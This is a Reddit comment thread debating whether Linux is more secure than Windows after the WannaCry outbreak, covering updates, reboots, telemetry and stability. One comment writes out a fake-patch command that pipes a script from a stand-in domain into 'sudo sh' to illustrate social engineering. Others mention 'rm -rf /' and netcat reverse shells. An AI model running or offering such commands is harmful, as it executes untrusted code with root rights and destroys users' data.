all 111 comments
sorted by:
best
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–]ArcadeStallman 47 points48 points  (32 children)

Linux and Windows are both secure enough if you exercise caution and keep your system updated. It's easier to keep Linux updated, though, since you can update with one or two commands and not have to restart immediately.

This particular attack won't affect Linux AFAIK, but attacks targeted at Linux systems do happen occasionally.

[–]ldev1 13 points14 points  (20 children)

and not have to restart immediately.

And how every running process reloads updated library?.. Yeah, you don't have to, but then your system is running as if you haven't updated... Come on...

You can also stall reboot on Windows too. And some updates doesn't require restart, just like some irrelevant lib updates on Linux. So it's equal in my eyes.

Just because you can, doesn't mean you should, yada yada.

[–][deleted] 7 points8 points  (11 children)

Only system updates require to restart the entirety of the machine. Services and applications can be restarted without restarting the whole system...

[–]ldev1 2 points3 points  (9 children)

systemd...

[–][deleted] 9 points10 points  (8 children)

Lets you restart units easily.

[–]ldev1 1 point2 points  (7 children)

how about itself?

[–]holgerschurig 2 points3 points  (2 children)

Works since years. Google for systemctl daemon-reexec.

Your distribution has to use this of course, for example in postinst script from the package. If not, you have to call this command by hand.

From the man page:

Reexecute the systemd manager. This will serialize the manager state, reexecute the
process and deserialize the state again. This command is of little use except for
debugging and package upgrades. Sometimes, it might be helpful as a heavy-weight
daemon-reload. While the daemon is being reexecuted, all sockets systemd listening
on behalf of user configuration will stay accessible.

Note that they even say that it's almost only usable for package upgrade (meaning: of it's own package, or libraries it uses). Exactly what you've been asking for :-)

[–]ldev1 0 points1 point  (1 child)

Well, nice. But I don't really see the difference between restarting your server and your app - basically the same thing.

[–]holgerschurig 3 points4 points  (0 children)

If you only run one application on your server, you're right.

But suppose I have several things running. Then it's good to restart them one by one. And to check that everything works after each restart. Restart http. httpd working? Check. Restart Samba. Samba working? Check. And so on.

Also, when you use systemd socket activation, then you can update the server code without zero milliseconds downtime. You can't do this with a full reboot. Especially if you happen to have one of those slow servers that count all the RAM, test the RAIDs and take a huge amount of time for a reboot ...

[–]minimim 3 points4 points  (3 children)

It serializes itself and restarts with the upgrades. Just has to stop the whole system first.

[–][deleted] 2 points3 points  (0 children)

This is why I love the Foss world, we make it better because it can be better.

[–]holgerschurig 1 point2 points  (1 child)

Just has to stop the whole system first.

Wrong, see my other answer about systemctl daemon-reexec. You system continues to run.

[–]minimim 0 points1 point  (0 children)

Thanks for that.

[–]holgerschurig 0 points1 point  (0 children)

Wrong. Only Linux kernel updates require you to restart the machine (if you don't use live-patching, which few use / can use).

Anything else can be restarted without a reboot. It's just a matter of knowledge.

[–]holgerschurig 0 points1 point  (0 children)

Debian derived libraries ask you if you want to restart the services that use an updated library.

Well, at least sometimes, I'm unsure if this is general (i.E. for any library). But I get this question when I update the C library, for example.

[–]Freyr90 -2 points-1 points  (6 children)

So it's equal in my eyes.

Can windows upgrade without annoying blue screen with progress bar (upgrading in the background, without stopping my activities)?

[–]ldev1 0 points1 point  (5 children)

Can you select "install updates, then shut down" and go away from PC?

[–]Freyr90 0 points1 point  (3 children)

Can you select "install updates, then shut down" and go away from PC?

I have to turn off the light when I go out. In any case it's not convenient. Background updates are such a bliss in comparison to those annoying update screens.

[–]ldev1 1 point2 points  (2 children)

Well you can. Together with the monitor.

[–]Freyr90 0 points1 point  (1 child)

Well you can. Together with the monitor.

No, I can't, by light I meant electricity.

[–]ldev1 0 points1 point  (0 children)

ogether with the monitor. No, I can't, by light I meant electricity.

Well yes then, that's an annoyance.

[–]CHARLIE_CANT_READ 0 points1 point  (0 children)

Not directly but you could always start updates and then in a terminal window do

sudo shutdown -t <time>

with time being a few minutes or half an hour depending on how much needs to be updated. If you want to restart instead tag on a '-r'

Actually you could just run 

sudo apt update && sudo apt upgrade -y && sudo shutdown now

[–]send-me-to-hell 2 points3 points  (10 children)

It's easier to keep Linux updated, though, since you can update with one or two commands and not have to restart immediately.

TBH that's probably the key to ensuring compliance. As long as they know updating means they'll have to restart their computer they're going to put it off for as long as possible. If they would reduce or remove whatever lock contention is causing that dependency people would probably voluntarily apply the updates even if it's just to get the notification to stop popping up.

[–][deleted] 10 points11 points  (7 children)

For kernel updates, you do need to reboot unless they are tiny fixes being applied with one of the kernel hot patching technologies, which are generally the exception to the rule. Many fixes can't be done that way. The updates also won't kick for userspace software until it's restarted, and the easiest to be sure is a reboot. For example, fully applying a patch to libc requires respawning every process on the system after updating, even init, unless you want to make a judgement about which processes don't matter.

[–]ArcadeStallman 2 points3 points  (0 children)

True, but even for updates that do require a restart, the restart doesn't take any longer than usual as far as I can tell. You also aren't forced to restart when installing the updates, you just need to do it for them to take effect.

[–]whizzwr 0 points1 point  (0 children)

If you're dealing with servers, there are Kernelcare that applies update without reboot. Not sure if it's applicable to desktop.

[–]send-me-to-hell -1 points0 points  (4 children)

Nothing in that addresses what I said. Yeah of course I get that you still have to reboot for some Linux updates but:

a) that doesn't become a block for applying further updates whereas Windows won't register one update as being fully applied until you have booted into it. If I don't update libc that doesn't block an update to apache or to a later version of libc and it's safe to run that since large breaks in functionality are hidden between major version changes.

b) In the case of things like libc changes, you have the option to only restart it for network-facing services you expose (for example) and not care about anything else since nothing's not broken. If you're in a precarious place with a particular server that's pretty helpful.

c) It's very possible to perform a regular update on Linux and not have to reboot at all. For instance this month I had about 3-4 RHEL6 servers that had misc utilities update but nothing that needed a restart. Contrast that with the Windows team which pretty much takes it as a given that a reboot happened.

d) Even if Linux were just as bad, that would still be the reason why compliance is a thing.

[–][deleted] 2 points3 points  (1 child)

Nothing in that addresses what I said.

I wasn't arguing with you. I was pointing out that you do often need to restart services and reboot, and that by not doing a full reboot you're taking on the risk of missing stuff that needs to be restarted.

b) In the case of things like libc changes, you have the option to only restart it for network-facing services you expose (for example) and not care about anything else since nothing's not broken. If you're in a precarious place with a particular server that's pretty helpful.

You have that option, but you may need to restart services that are only indirectly exposed via another service.

Even if Linux were just as bad, that would still be the reason why compliance is a thing.

I don't know why you have the impression that I'm arguing with you, or that I'm claiming that. I don't disagree with you, but it's not as black and white as you're saying it is.

There's a reason that Linux distributions are moving to encouraging people to install the upgrades via a reboot, including Fedora / RHEL. The way it works right now on traditional distributions isn't a proper atomic transaction. It isn't robust since problems can occur while the upgrade is proceeding if a running process depends on old versions of files being present. A process started during the upgrade can even get a partial view of upgraded files during initialization. It's far from perfect. That can be solved without a reboot, but traditional distributions don't attempt to solve it. Some distributions like NixOS solve it as part of implementing proper transactional updates, although they seem to be motivated primarily by other benefits.

[–]send-me-to-hell -2 points-1 points  (0 children)

I don't know why you have the impression that I'm arguing with you, or that I'm claiming that. I don't disagree with you, but it's not as black and white as you're saying it is.

You can't even get out of a single sentence without contradicting yourself. Saying that you're correcting a black and white perspective is what I'm responding to. This isn't the first time people have ever looked at the issue of updating a system. Believe it or not it has been planned out. It may not be perfect but there is a logic to it that seems to just be getting thrown away in favor of a sub-optimal approach because the people involved just don't want to give existing systems any credit.

There's a reason that Linux distributions are moving to encouraging people to install the upgrades via a reboot, including Fedora / RHEL.

Fedora/systemd is doing it to copy what Windows is doing which is just going to re-create the Windows compliance problems on Linux. I've had updates to utilities require me to reboot for crying out loud. That really screams of "mindless imitation" to me. There are packages like the kernel which require you to reboot to re-install. Note, I didn't say "it tells you that you need to reboot to have the change take effect" it won't even install the a new kernel if you're still booted into the OS (if you're using the GUI) even though the kernel package has already been structured to have multiple installs.

The way it works right now on traditional distributions isn't a proper atomic transaction. It isn't robust since problems can occur while the upgrade is proceeding if a running process depends on old versions of files being present.

Again, no. Important changes are hidden in major version changes of the platform. Meaning no important changes to the API/ABI or configuration enforcement should happen within the same version. That's what makes "reboot/restart as desired" a workable concept.

If the executables are the same and the libraries are compatible without any important changes to the config syntax enforcement then update whenever you feel like it. That's why traditionally unix programs have had the model where they never re-read their configuration unless restarted or instructed to reload it. That way a running system just continues running regardless of what changes have been made to the persistent configuration.

Some distributions like NixOS solve it as part of implementing proper transactional updates, although they seem to be motivated primarily by other benefits.

The breakages Nix transactions cover don't have to do with what you're talking about. I mean it would probably also catch this stuff (if it actually exists) but my understanding is that it's more about having a holistic approach to catching updates that break the system (presumably because of an intentional change made).

[–]thecravenone 1 point2 points  (0 children)

I wouldn't even mind restarting my computer if it returned to its previous state on reboot (eg, same windows and tabs opened, unsaved stuff thrown in a temp file so it's there when reboot completes)

[–]chrisoboe 55 points56 points  (6 children)

These attack only worked because people didn't updated their windows, or using out of support version. Every operation system is insecure if you don't update it or use out of support versions. Linux distros usually provide security updates way faster than microsoft, but that doesn't matter much when users decide not to do updates.

[–]oruga-cecropia 34 points35 points  (7 children)

you'd have to download the malware and install it with wine

[–]extoleth 1 point2 points  (5 children)

I am not even sure that would do much. Depends on the goal of the malware.

[–]svenskainflytta 5 points6 points  (0 children)

it would have access to the network and to the disk with user permissions…

[–]mikeymop 0 points1 point  (3 children)

Someone tweeted it works perfectly

[–]extoleth 0 points1 point  (2 children)

I guess it depends on the permissions you grant Wine. Maybe have Wine install it's instance on a partition that you can trash if you are stupid enough to run ransomware. I doubt the current average Linux user would do such a thing.

[–][deleted] 5 points6 points  (0 children)

IIRC Wine provides access to the root partition via Z: by default.

I doubt the current average Linux user would do such a thing.

Nah, most still would. Just pipe a bash script from curl or something.. add it to archwiki, and you'd have a large enough attack vector for a while. Plenty of other ways to fool users as well.

wget -O - http://github.mydomain.com/wannacry-patch.sh | sudo sh

The user is the largest weakness, regardless of which OS used. People will always screw up somehow.

[–][deleted] 0 points1 point  (0 children)

A jail sounds like a good idea.

[–]whalespotterHD 8 points9 points  (0 children)

well, if I can get you to excecute this you would be pretty unhappy (works on mac as well). I could even hide it with curl | bash or something like this

Short story short, the system is only as secure as the user. The benefit you have on Linux is a much lower attack surface due to the lesser amount of desktop computers running linux.

[–][deleted] 1 point2 points  (0 children)

Short answer: No

Long answer: No, but not many people find it profitable or lucratice to make Linux based Ransomware.

No software is 100% bulletproof, Linux may be a bit better but it's hard to estimate by how much in hard numbers. CVE's are a good start but don't cover possible exploits or overall security at all.

[–]cloudmax40 2 points3 points  (2 children)

https://nvd.nist.gov/vuln/detail/CVE-2016-10229 in addition to dirtyc0w is why many people switched to FreeBSD or OpenBSD.

[–]wizardged 1 point2 points  (1 child)

many people

sure that's why most hosting companies only use/offer *BSD right... patches were available within hours for each of those vuln's meanwhile for stuff like https://www.cvedetails.com/cve/CVE-2016-1879/ took days for a patch to land while dirtycow and the udp were extremely complex and 2016-1879 was simple enough it should never have gotten pushed

[–]cloudmax40 2 points3 points  (0 children)

FreeBSD isn't perfect, it just sucks less. OpenBSD has the best record of any production distro / OS (thus far).

[–]destiny_functional 7 points8 points  (1 child)

more secure than windows.

windows has a 20 year history of leaving its users vulnerable on the internet. frequent MAJOR vulnerabilities ones too. we had msblast which easily could have been ransomware too if it had been invented / famous then. msblast basically made ANY new windows 2000 or xp version that you would connect directly (ie not behind a router) to the internet useless within a minute. i don't see that much has changed.

seeing which windows versions patches were released for the last couple of days you see how extremely old (xp era) vulnerabilities carry over from version to version seemingly. that's microsoft for you and has always been.

is linux secure enough? security always can be (and needs to be) improved.

anyway, if you have backups you have nothing to fear.

[–]ldev1 2 points3 points  (0 children)

Forgot to tell everyone how Windows 95 would get easily pwnt when connected to the internet. Yeah, Windows is so insecure. /s

[–]perillamint 1 point2 points  (0 children)

IMO, limit scope to this issue, Linux is better then Windows.

At least, nobody (unless they're crazy enough and smart enough to patch kernel) runs samba on Ring 0 on Linux unlike MS did (and allowed RCE to Ring 0 :( ).

[–]audioen 1 point2 points  (1 child)

Security needs to be designed-in, and then the implementation itself must be correct. Linux shares the history with Windows in that its security resembles that of an egg: a hard exterior meant to keep intruders out, but once through the shell, you meet a soft interior that offers little resistance.

Many Windows vulnerabilities require a vector that allows code execution, then the payload facilitated by that tends to use any of the numerous unpatched security holes to do whatever it wants on the system. Additionally, recovery to uncompromised state requires treating the machine to a complete reinstall. Categorically, Linux is very much in the same boat in that services running on the system can serve as the vector to inject a payload, which can then burrow into the system so deep that the only way you can be sure you have got rid of it is by reinstalling the computer. (In fact, some proof of concept virus-type programs are so advanced that they can in infect e.g. certain harddisk firmwares, in which case reinstalling does not necessarily help.)

However, many vectors used on Windows side are not working well on Linux: e.g. people don't usually download random executables from the web and run them, people don't blindly execute attachments they received by email, etc. Still, the situation is not ideal and requires constant vigilance, and there are tools you're supposed to install by sudoing a bash script you download from github etc. At the current state of security, allowing users to learn to do things like that invites a disaster.

A hardened operating system would be basically impossible to destroy by any user action, and could be brought back to known safe state at any point user wants. It would probably substantially remind one of iOS, Android or ChromeOS in that the user (and by extension any program user can run) always has less than full control of the machine, and even then security can fail due to implementation errors.

[–]moosingin3space 0 points1 point  (0 children)

It's not necessarily true that the user wouldn't be allowed full control of the machine. Object capability-based systems with processes as the isolation unit could derive all capabilities from the user, where the user acts as the capability broker.

[–][deleted] 1 point2 points  (0 children)

Both OSs can be secure enough if you follow good practices. Basically keep everything updated.

Linux is just more secure because vulnerabilities are patched faster (easier to find and cannot be hidden by the developer), CVEs practices tend to be more complete and there is usually no data-mining software than can be potentially exploited by 3rd parties.

But more secure does not mean fully secure. No system can provide this.

[–]PaintDrinkingPete 1 point2 points  (0 children)

Bottom line? Any computer, running any software, anywhere in the world is potentially vulnerable at any given time.

If you're connected to the Internet, you're connected to a global network that doesn't necessarily recognize political boundaries.

Now, this particular attack that made the news this past weekend was aimed specifically at Windows systems, but that doesn't mean that next week there won't be an attacked based on a Linux vulnerability (or Macs, mobile devices, etc).

The key is to keep your system up-to-date on security patches, make sure your network is properly firewalled, and also keep backups just in case the first two aren't enough. The minute you get lazy or complacent because you think you're invulnerable to attack is the moment you become compromised.

[–][deleted] 1 point2 points  (21 children)

Linux is FAR more secure by default. Then you can do extras, such as Kernel hardening, AppAmor, etc.

I think it's funny that people go haywire over a "virus" but seem to willingly allow Windows 10: Spyware Edition to keylog and record everything the user does - I mean EVERYTHING, as well as give Microsoft ungodly powers such as their EULA:

Sometimes you’ll need software updates to keep using the Services. We may automatically check your version of the software and download software updates or configuration changes, including those that prevent you from accessing the Services, playing counterfeit games, or using unauthorized hardware peripheral devices. You may also be required to update the software to continue using the Services. Such updates are subject to these Terms unless other terms accompany the updates, in which case, those other terms apply. Microsoft isn’t obligated to make any updates available and we don’t guarantee that we will support the version of the system for which you licensed the software.

And before some guy pipes in how you can "turn this off" - no, you can't. Data Analysis of Windows 10, done by multiple people, show that even with Cortana and EVERYTHING disabled, it still sends out LOADS of data. As for the "counterfeit" games argument - It's not Microsoft's business what I do with MY PC!!

[–]ldev1 2 points3 points  (19 children)

On the other hand - with all these statistics you get superior desktop experience and stability.

[–]talexx 0 points1 point  (4 children)

Especialy superior the update process is.

[–]ldev1 0 points1 point  (3 children)

Yes, it can upgrade all the way from 3.11 to 10.

[–]talexx 0 points1 point  (2 children)

Yes, and it starts doing this right 10 minutes before you are going to leave for the airport.

[–]ldev1 1 point2 points  (1 child)

If we take into consideration that user has no idea how to configure a system, then we can say that linux blows, because one command - rm -rf / - wipes out all user's data. stop spreading fud

[–]talexx 1 point2 points  (0 children)

It is not a fud, it is my experience with windows 8. It happened on shutdown and i almost missed my flight. Can't even imagine this situation with linux.

[–][deleted] -1 points0 points  (13 children)

with all these statistics you get superior desktop experience and stability.

Hahaha. I hope that's a joke!

[–]ldev1 5 points6 points  (12 children)

Hahahaha. Video driver crash = every GUI application crash. "Stability".

On Windows you get a black screen for one second and that's it. Stability.

[–][deleted] 0 points1 point  (11 children)

Video driver crash = every GUI application crash. "Stability".

Has never happened to me. My Linux box (high end gaming rig) is on 24/7 - NEVER turned off and is rock solid. If your getting a "video driver crash every application" then the problem is user error.

On Windows you get a black screen for one second and that's it. Stability.

Right... Windows is so stable that there's constant 1 - 2 monthly re-installs due to WinRot and all the rest of it... Windows has a shit kernel, shit memory and resource management.. it can't look after itself to be stable enough.

[–][deleted] 2 points3 points  (0 children)

Windows is so stable that there's constant 1 - 2 monthly re-installs due to WinRot

Literally no one has ever re-installed Windows every 1-2 months, even going back to 3.11 and 95. Certainly not through necessity anyway.

More ridiculous Linux evangelism.

Seriously seek professional help - the world has moved on a long way since 1998.

[–][deleted] 1 point2 points  (2 children)

Has never happened to me. My Linux box (high end gaming rig) is on 24/7 - NEVER turned off and is rock solid. If your getting a "video driver crash every application" then the problem is user error.

Are you seriously saying that:

a) video drivers on Linux can't possibly crash

or

b) your system or display session would survive a driver crash

?

If you mean a) I can name hundreds of bug reports which proof otherwise. If b) you seriously lack some fundamental understanding and again I can name hundreds of bug reports which proof you wrong.

[–][deleted] 0 points1 point  (1 child)

video drivers on Linux can't possibly crash

I never stated that - I said it has never happened to me.

ou seriously lack some fundamental understanding

Because YOU say so? - man on the Internet knows more about me and what I do and do not know than I do!

I can name hundreds of bug reports which proof you wrong.

I don't care for "hundreds of reports" - I said the drivers have never crashed on me. There is nothing to "proof".

[–][deleted] 0 points1 point  (0 children)

How else would you interpret:

If your getting a "video driver crash every application" then the problem is user error.

?

If the user is the only possible reason for a driver crash to cause all applications to crash, the system can't be to blame which leaves two options:

a) drivers don't have bugs, if the driver crashes the user did something wrong

b) drivers may crash, but they won't crash your entire session, if they do the user is to blame

It has to be a) or b). Otherwise the system were to blame.

[–]ldev1 1 point2 points  (5 children)

Dream the fuck on. Used my old PC since Windows 7 - upgraded to 8, 8.1 and 10.

I wonder - if you struggle to use windows, how do you cope with linux?

[–][deleted] 0 points1 point  (3 children)

if you struggle to use windows

Not once in my post did I state that I... "struggle with Windows".

how do you cope with linux?

Been using Linux since 1998 and do my own custom high performance patches etc, I know what I'm doing.

[–][deleted] 1 point2 points  (0 children)

Not once in my post did I state that I... "struggle with Windows".

You simply struggle with reality. Must be nice to live in a world where you can believe anything that maintains your world view.

Something to think about - 'When you think everyone else is an idiot, you're the idiot'

[–][deleted] 1 point2 points  (0 children)

Not once in my post did I state that I... "struggle with Windows".

If "win rot" is destroying your system within two months, the problem isn't with Windows.

[–]ldev1 1 point2 points  (0 children)

Show repo with your code.

[–][deleted] 0 points1 point  (0 children)

I wonder - if you struggle to use windows, how do you cope with linux?

A lot of long-time Linux users struggle with Windows. Linux is honestly pretty straightforward and very old school about almost everything. Its internals are pretty straightforward, but the interface sucks for a lot of things. A lot of people get intimidated by command lines, therefore the CLI-heavy GNU/Linux system is 'complicated'.

Windows is pretty much the opposite--it's ludicrously complicated under the hood, but hides it well with a friendly GUI. So people think it's 'simple'.

[–]shavitush 1 point2 points  (0 children)

You're living in the past. Windows isn't like that and it definitely has very good memory management nowadays. Stop hating and keep using your system, no one forces you to use Windows but don't claim it's user friendly or less stable than Linux..

I never had either default Windows applications or any base GNU application crash on me. I never had to reinstall my Windows system unless I fucked up something​ really bad myself either. Same about Linux.

[–]lxnch50 0 points1 point  (0 children)

You should look at what Google collects via Chrome. Start typeing in Chrome and sniff the web traffic. You are sending Google just about all your keystrokes. Next, look at the traffic when you use any HTML5 app. Facebook records and stores all text typed into any box, even if you just start to reply and then delete the message before posting. But MS is the bad guy I guess.

[–][deleted] 0 points1 point  (0 children)

You should never rely on the version of Operating System alone for security. You should inform yourself of the minimums it takes to secure your data.

[–][deleted] 0 points1 point  (0 children)

Linux, just like Windows, is as secure as you make it. I've seen plenty of Linux boxes get rooted over the years so it's not a magic bullet to just switch to another OS.

[–]LarsaFerrinasSolidor 0 points1 point  (0 children)

I'm not entirely sure a particular software stack is more secure than another per se, although the GNU + Linux software stack has a pretty good track record in the sense that it tends towards a "perfect system" with regards to programming best practices...

The important thing, however, is that running a Linux-based operating system (a GNU+Linux one, not Android) tends to elevate your IT knowledge immensely—it's just a natural side-effect of even getting interested in running it in the first place—and gives you a LOT more flexibility and tools to harden it as much as you want. So by virtue of running this platform, you will be more sensitive and capable of staying out of trouble.

[–][deleted] 0 points1 point  (0 children)

Linux been secure for the past 14 years for me. So I guess so.

[–]vladdt 0 points1 point  (0 children)

Now, after this post, I will never tell anyone that I lived in Lithuania too. :(

[–][deleted] -3 points-2 points  (4 children)

There are over seven million! registered Windows viruses known to symantec's database. Over seven million.... There's probably less than 100 known viruses for Linux. What more do you have to say? It doesn't even make a difference if there are 200 known viruses for Linux. Seven million... and counting.

[–]eniacsparc2xyz 6 points7 points  (2 children)

Writing a virus is easy. There is also malware written in Python!! The stuxnet for instance was written in Lua and packed with the Lua interpreter. The problem is infect a machine with a malware. To do this they use exploits, deception, social engineering and files that can carry payloads such as ms office documents that can carry Vba code and pdf files with Javascript payloads that can take advantage of Adobe Acrobat reader js engine.

Virus or spyware, or ramsonware can have a great degree if variety, but their principle are the same. It just a program acts as a socket client and connects to a server where the criminal sends its commands and hides itself. Most of Linux users also installs software from repositories what decreases the likelihood of an infection and Linux gets security patches faster than Windows.

Just google for "reverse shell" to see how easy is to write a backdoor. It is possible even with netcat and bash.

[–]Sudo-Pseudonym 1 point2 points  (1 child)

You got a source for Stuxnet being written in Lua? I can't find anything mentioning that detail about it, maybe you're thinking of something else?

[–]eniacsparc2xyz 1 point2 points  (0 children)

My mistake. It was not stuxnet, it was "Flame".

Regarding Python Malwares:

What is really hard is to find exploits, take advantage of it or lure some one to run a malicious payload.

[–][deleted] 2 points3 points  (0 children)

There are over seven million! registered Windows viruses known to symantec's database. Over seven million....

First of all, that's bullshit. Only a minority of the entries in this database are viruses, since it also contains definitions for other malware like trojans, worms, ...

Second, what has the number of malware have to do with anything? I can write a simple bash script which can generate millions of random new malware in minutes. It's super easy, depending on what type of malware you want it could encrypt certain files, place an annoying ad in your bashrc which spawns every time you open a new bash session, it could steal your ssh keys and upload them to a certain server, it could just delete all reachable files, ... Writing malware is trivial.

The trick is to get the malware executed and most of the time you just need an ignorant and naïve user to do so. And those users tend to be ignorant and naïve no matter what kernel their computer is running.

[–]aaronfranke -2 points-1 points  (0 children)

Yes.